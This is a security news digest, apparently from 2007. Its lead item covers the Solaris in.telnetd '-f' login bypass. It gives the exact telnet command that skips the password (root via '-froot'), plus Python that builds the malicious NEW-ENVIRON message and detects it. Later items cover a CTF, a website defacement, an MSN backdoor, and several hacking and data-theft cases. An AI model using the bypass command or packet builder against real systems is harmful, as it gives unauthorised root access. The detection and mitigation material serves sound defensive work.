What appears to be an old security issue has come back to bite Sun's flagship Solaris OS in the "root", so to speak. A bug in the way "in.telnetd" on Solaris 10 and 11 (SunOS 5.10/5.11) passes the client-supplied USER variable to login allows attackers to log into the telnet service WITH NO PASSWORD. This is essentially the same "-froot" bug that affected rlogin in the BSD tools shipped with AIX, Linux and many other *nix systems as long as 10 years ago. Solaris 9 and below appear not to be vulnerable.
The flaw was brought to light by security researcher "Kingcope", who announced it on the Full Disclosure mailing list and released a paper describing it.
According to CERT, "By supplying a specially crafted USER environment variable over telnet, a remote attacker may be able to bypass authentication to gain access to the system with elevated privileges. Public exploit code is available." They correctly note that the attacker must know the name of a valid user on the system, but their statement that it cannot be used to gain root access only holds for the default configuration.
When root is allowed to log in from somewhere other than the console (the CONSOLE line in "/etc/default/login" commented out), the same trick with the user name set to "-froot" gives root access directly.
To test whether you are vulnerable, simply try to telnet to your Solaris box with this command:

telnet -l "-f<user>" <hostname>

where <user> is any account that exists on the target. If you are dropped into a shell without being asked for a password, the host is vulnerable.
Security experts are suggesting a few different mitigation techniques to protect systems from this flaw, as there is no patch currently available from Sun:
- firewall access to port 23
- disable the "telnet" service (on Solaris 10 it is managed by SMF: "svcadm disable telnet")
- disable "in.telnetd" in the "/etc/inetd.conf" file on systems that still use inetd
- make sure "/etc/default/login" contains an uncommented "CONSOLE=/dev/console" line, which limits root logins to the console
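The following is an added example, not code from the original article, from Sun or from Kingcope's advisory. It shows what the "crafted USER environment variable" in CERT's note actually looks like on the wire: the telnet client delivers the "-l" login name as the USER variable inside a NEW-ENVIRON (RFC 1572) subnegotiation, so the whole attack is a single option message. The block encodes and decodes that message, flags USER values that begin with a dash (the check an intrusion detection signature for this bug would make on port 23 traffic), and checks the CONSOLE setting in /etc/default/login that decides whether the bug yields root. All function names are mine, and the sample exchange is constructed, not captured from a real Solaris host.

```python
"""
Telnet NEW-ENVIRON (RFC 1572) encoder/decoder, a detector for the
USER=-f<user> trick, and a check of the /etc/default/login mitigation.
Added example for this article; not code from Sun or Kingcope.
"""
from typing import Dict, List

IAC, SB, SE, WILL, DO = 255, 250, 240, 251, 253   # telnet command bytes
NEW_ENVIRON = 39                                   # option number (RFC 1572)
IS, SEND = 0, 1                                    # subnegotiation commands
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3              # RFC 1572 type codes


def _escape(data: bytes) -> bytes:
    """Prefix type-code bytes with ESC and double IAC inside a payload."""
    out = bytearray()
    for b in data:
        if b in (VAR, VALUE, ESC, USERVAR):
            out.append(ESC)
        elif b == IAC:
            out.append(IAC)
        out.append(b)
    return bytes(out)


def build_new_environ_is(env: Dict[str, str]) -> bytes:
    """Encode the client's IS reply.  `telnet -l NAME` makes the stock
    client send USER=NAME this way, so `-l "-froot"` places the string
    "-froot" in the USER variable that in.telnetd hands to login."""
    out = bytearray([IAC, SB, NEW_ENVIRON, IS])
    for name, value in env.items():
        out += bytes([VAR]) + _escape(name.encode())
        out += bytes([VALUE]) + _escape(value.encode())
    out += bytes([IAC, SE])
    return bytes(out)


def _decode_vars(payload: bytes) -> Dict[str, str]:
    """Turn the body of an IS subnegotiation back into a dict, undoing the
    ESC and IAC IAC escapes.  A VAR with no VALUE is recorded as empty."""
    env: Dict[str, str] = {}
    name, buf, kind, i = None, bytearray(), None, 0

    def flush() -> None:
        nonlocal name
        if kind in (VAR, USERVAR):
            name = buf.decode(errors="replace")
            env[name] = ""
        elif kind == VALUE and name is not None:
            env[name] = buf.decode(errors="replace")

    while i < len(payload):
        b = payload[i]
        if b == ESC and i + 1 < len(payload):             # ESC x -> literal x
            buf.append(payload[i + 1])
            i += 2
        elif b == IAC and i + 1 < len(payload) and payload[i + 1] == IAC:
            buf.append(IAC)                               # IAC IAC -> 0xff
            i += 2
        else:
            if b in (VAR, VALUE, USERVAR):                # start of a new field
                flush()
                kind, buf = b, bytearray()
            else:
                buf.append(b)
            i += 1
    flush()
    return env


def parse_new_environ(stream: bytes) -> List[Dict[str, str]]:
    """Extract every NEW-ENVIRON IS subnegotiation from a raw telnet byte
    stream, honouring IAC IAC so an escaped 0xff inside a value is never
    mistaken for the IAC SE terminator."""
    head = bytes([IAC, SB, NEW_ENVIRON, IS])
    found: List[Dict[str, str]] = []
    i = stream.find(head)
    while i >= 0:
        j = i + len(head)
        while j < len(stream) - 1:
            if stream[j] == IAC:
                if stream[j + 1] == SE:
                    break
                j += 2                                    # skip escaped pair
            else:
                j += 1
        found.append(_decode_vars(stream[i + len(head):j]))
        i = stream.find(head, j + 2)
    return found


def suspicious_user_values(stream: bytes) -> List[str]:
    """USER values beginning with '-' are option-injection attempts against
    login(1): no legitimate account name starts with a dash."""
    return [env.get("USER", "") for env in parse_new_environ(stream)
            if env.get("USER", "").startswith("-")]


def root_console_only(login_defaults: str) -> bool:
    """Mitigation check: root may log in only on the device named by an
    active (uncommented) CONSOLE= line in /etc/default/login.  A commented
    out, empty or missing line lets root log in over telnet as well."""
    for raw in login_defaults.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep and key.strip() == "CONSOLE":
            return value.strip() != ""
    return False


# Constructed exchange for `telnet -l "-froot" host` once the server offers
# NEW-ENVIRON.  Not a capture from a real system.
SAMPLE_ATTACK = (
    bytes([IAC, DO, NEW_ENVIRON])                      # server: DO NEW-ENVIRON
    + bytes([IAC, WILL, NEW_ENVIRON])                  # client: WILL
    + bytes([IAC, SB, NEW_ENVIRON, SEND, IAC, SE])     # server: SEND
    + build_new_environ_is({"USER": "-froot"})         # client: IS USER=-froot
)

if __name__ == "__main__":
    print("suspicious USER values:", suspicious_user_values(SAMPLE_ATTACK))
    print("root restricted to console:",
          root_console_only("#CONSOLE=/dev/console\nPASSREQ=YES\n"))
```

Run against a pcap payload or a honeypot log, the detector catches any account name starting with a dash, not only "-froot", since the same injection works with any valid user. The CONSOLE check is what separates "attacker gets a user shell" from "attacker gets root" on an unpatched host.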
Sun has responded to this discovery; you may read their response here.
The disclosure of this vulnerability to the public without vendor notification, or a patch, keeps the fires burning on the question of the "Full Disclosure" style of alerting the world to security flaws.
Hack In The Box has announced a Capture the Flag ('CTF') hacking competition with cash prizes that will take place at the Sheraton Creek Hotel, Dubai, from 4 to 5 April 2007. This is the second CTF to be held in the Middle East, after the one at HITBSecConf2005, which was run in Bahrain.
This CTF game is an attack-only version of the popular competition held once a year in Kuala Lumpur: several teams of three players will compete in launching penetration attacks against pre-configured servers and target machines.
According to the official website, "Each machine is configured with various services (some of which may be vulnerable while others might not be). Participants are required to retrieve pre-configured files or 'flags' from the target machine in order to score points. Attendees are not barred from attacking each other; however, any participant found using denial of service attacks will be removed from the game immediately."
These servers reproduce a digital environment as close as possible to a real one, but each application contains both known vulnerabilities and specifically designed breaches.
Players are allowed to use any kind of technique to hit the targets and collect as many flags as possible, but hard limits are imposed on participants to prevent them from subverting each other: no network flooding and no DoS attacks are permitted, and, as highlighted on the official website, "NO harassment of other opponents (verbal abuse, etc), NO physical attack, NO attacking of Score Servers" will be tolerated.
The team that collects the highest number of flags over the two-day race will be the winner and take the $3,000 prize, with $2,000 going to second place and $1,000 to third.
The main objective of the CTF competition is to create an occasion for experts in hacking techniques to show their abilities and the legal application of such skills. Moreover, as declared by Meling Mudin, lead organiser of the CTF competition and a core member of the HITB team: "it allows information security practitioners the opportunity to showcase their security research capabilities and skills to the rest of the world."
'This
is evident by the number of serious independent security consultants,
security research and development companies, and security consulting
companies which routinely send their best guys to participate in the
Malaysian competition', he added.
The race will take place during HITBSecConf2007, which starts on 2 April.
Canadian Nuclear Safety Commission's website attacked
The Canadian Nuclear Safety Commission's website was hacked last week by an unknown attacker who replaced the official "Media Releases" section with a section named "security breaches", where he (or she) posted a photograph of a nuclear explosion. The picture was labelled "for Immediate Release" and carried the caption: "Please dont [sic] put me in jail … oops, I divided by zero."
The attack provoked astonishment and concern across Canada, because the Canadian Nuclear Safety Commission's IT systems hold sensitive details about nuclear activities in Canada and about how the movement of high-risk sealed radioactive sources is tracked.
According to Aurèle Gervais, the Commission's spokesman, the attack poses no danger to national security, since there is no way anyone could get access to "potentially dangerous information" without a secure government login. Moreover, Mr. Gervais confirmed that the attack was carried out on a part of the website run by an external provider with no link to the internal site.
Although an information leak is very unlikely, the Commission is going to investigate thoroughly and has already asked the Royal Canadian Mounted Police, the national police service, to investigate.
This is the first time such an attack has been carried out against the Canadian Nuclear Safety Commission, but considering the variety of vulnerabilities discovered every day, it will hardly be the last.
MSN addicts, pay attention! The Taipei Times reported that thousands of people across Taiwan have been affected by a virus transmitted through MSN that allows attackers to take control of users' PCs.
Many of them received a link from friends who were legitimately in their contact list. Once they clicked on it, they discovered that a backdoor virus had been installed on their computers.
Many users reported that first their contact list disappeared and it became impossible to close MSN Messenger. Some said that data was wiped from their computers, while others reported nothing untoward after clicking on the Messenger link.
There is no clear information about the nature of the virus or how widespread it is: on the one hand MSN representatives claimed that they detected a backdoor named BKDR_RINBOT.A, and on the other, experts from the Chinese division of Symantec said it could be identified as Backdoor.irc.Bot.
According to Symantec, the virus uses the contact list to send the link so that the recipient is taken off guard.
The purpose of this kind of attack is both to obtain more contacts to continue spreading the virus and to gain full control of the infected computer. Moreover, it was verified that infected computers execute the virus at every reboot and try to connect to an IRC chat server, so that other computers connecting to that server would become infected as well.
The US Army has declared war on military data leaks, but its security programme has not met with enthusiasm from privacy groups, which have harshly criticised the initiative to monitor and eventually censor websites and soldiers' blogs.
According to the Register, the Electronic Frontier Foundation (EFF) sued the US Department of Defense after the Department and the Army failed to respond to Freedom of Information Act (FOIA) requests about the blog monitoring programme.
All federal agencies, including the Department of Defense and the Army, are required to comply with the Freedom of Information Act (FOIA), which obliges institutions to disclose records requested in writing by any person. The EFF focuses on the fact that an Army unit called the Army Web Risk Assessment Cell (AWRAC) is charged with notifying webmasters and bloggers when it finds "sensitive information".
Bloggers, however, sometimes complain that they are coerced into censoring passages that have nothing to do with military information but deal with their personal feelings about the war.
"Soldiers should be free to blog their
thoughts at this critical point in the national debate on the war in
Iraq," EFF staff attorney Marcia Hofmann said. "Of course, a military
effort requires some level of secrecy. But the public has a right to
know if the Army is silencing soldiers' opinions as well. That's why
the Department of Defense must release information on how this program
works without delay."
On the other hand, an Army statement emphasises that: "AWRAC notifies webmasters and blog writers
when they find documents, pictures, and other items that may compromise
security. AWRAC reviews for information on public websites which may
provide an adversary with sensitive information that could put soldiers
or family members in danger. AWRAC assesses the risk the information
poses to the military and determines if the next step is to request the
information be removed."
Although AWRAC has no legal authority to impose changes to postings or to take down a website, no member of the US Army would dare to make a stand. Indeed, the unit has considerable influence, since the mere fact that a soldier's superiors are informed of such matters can be a worry for the soldier.
This initiative to support soldiers' right of expression is part of the EFF's FLAG Project, which uses FOIA requests and litigation to shed light on government abuses of privacy.
Last week a former Morgan Stanley consultant was found guilty in a data theft case: Ira Chilowitz, 44, was accused of stealing the names of the brokerage firm's hedge fund clients and confidential information about the fees they were charged, Reuters reported.
The defendant stated that he took proprietary documents from his company's database because he and another individual were planning to set up their own consulting firm and thought that such confidential information could help them win business. Morgan Stanley's spokesmen did not comment on the case.
According to the prosecutor's court filings, the data on the company's hedge fund clientele "would be highly valuable to competitors of Morgan." This is the main reason behind the charges of conspiracy, theft of trade secrets, unauthorized computer access and transportation of stolen property brought against Mr. Chilowitz. Mr. Chilowitz was arrested in July and now faces up to 26 years in prison and an $850,000 fine.
Criminal investigation methods keep changing with the development of new technologies and tools, but recently a curious trend has been reshaping investigative techniques.
The trend consists in posting pleas about murders, kidnappings, burglaries and other crimes on social networks such as MySpace, in order to catch the attention of the widest possible audience and collect information that might help investigations. In other words, these pleas work as high-tech equivalents of "wanted" posters.
Such initiatives are taken by crime victims and police alike, showing yet another side of the influence the Internet has on everyday life.
For instance, relatives of a Chicago doctor who was murdered last October posted on MySpace.com a surveillance video showing a blood-spattered young man rushing from the building.
The victim's son explained this choice as an attempt to draw attention to the case: "Young people between 18 and 25 are probably not watching the nightly news or reading the newspaper every day. That audience is probably on the Internet, and they all have MySpace."
After they posted an announcement on MySpace offering a $25,000 reward, the page received more than 40,000 hits in six weeks, although Chicago Police admitted they had not received any calls, only a few e-mails.
Social networks have long been monitored by police agencies looking for sexual predators or terrorist organisations, and now they are actively using them as a crime-fighting tool: as reported by the US magazine USA Today, one detective said that he gets "probably one, two MySpace cases a week."
Is money made by data thieves a source of terrorist funding? The link between cyber crime and terrorism is quite foggy, and it is not easy to determine which activities are backed by terrorist organisations and which are carried out by "normal" attackers. Still, as stated by Avivah Litan, Gartner's resident expert on identity theft, recent events have cleared up the situation a bit. "This is something people have been talking about since 9-11," she says. "But it's really a new phenomenon."
The first concrete evidence of cracking activity aimed at fund-raising for Middle East extremist groups was discovered in late 2006, thanks to the arrest of approximately 50 people in Egypt and Lebanon. The arrests led to the discovery of millions of dollars stolen using pilfered debit and credit card account numbers.
Ms. Litan's statement came after last week's attack on the company behind the T.J. Maxx and Marshalls retail chains, which caused a huge data breach. There is no confirmation of terrorist involvement in that attack, but security experts do not hide their concern about the possibility. Specifically, Ms. Litan's remarks focus on the debate about what is really happening on the digital ground: nothing new... but very little known!
People go hacking (and cracking) for the strangest reasons, but... wow! Now there is also someone who hacks for gossip! This could have been the start of an unconventional story about secrets stolen for frivolous reasons, but even though the underground is such a small world, there are no juicy implications in this story and, despite appearances, this digital intrusion was committed for money.
According to the Associated Press, a British tabloid journalist who hacked into royal officials' voicemail was sentenced on Friday to four months in prison.
Clive Goodman, 49, the royal editor of the News of the World, was probably looking for a career-saving scoop, so he hired a private investigator, Glenn Mulcaire, to hack into royal officials' voicemail systems and intercept messages from members of the British royal family.
Mr. Goodman’s lawyer claimed that
“Mr. Goodman's stories were no longer considered adequate by
his superiors.”
"He was demoted, sidelined and a younger reporter was assigned to cover the royal family. Under that pressure, he feared for his job," he said.
Unfortunately for Mr. Goodman, the judge did not consider "working pressure" a reasonable excuse for uncontrolled access into the royal family's life, and he and Mr. Mulcaire were sentenced to four and six months in prison respectively.
Soon after the sentences, Andy Coulson, the editor of the News of the World, resigned.
As Mr. Mulcaire admitted, he managed to get hold of the confidential PIN numbers that the mobile phone network operators use to access messages left on the royal cell phones. So, between November 2005 and June 2006, he and Goodman made 609 separate calls to the voicemail systems of three senior members of the royal household. Their lack of experience led to a series of digital mistakes that allowed police to arrest them.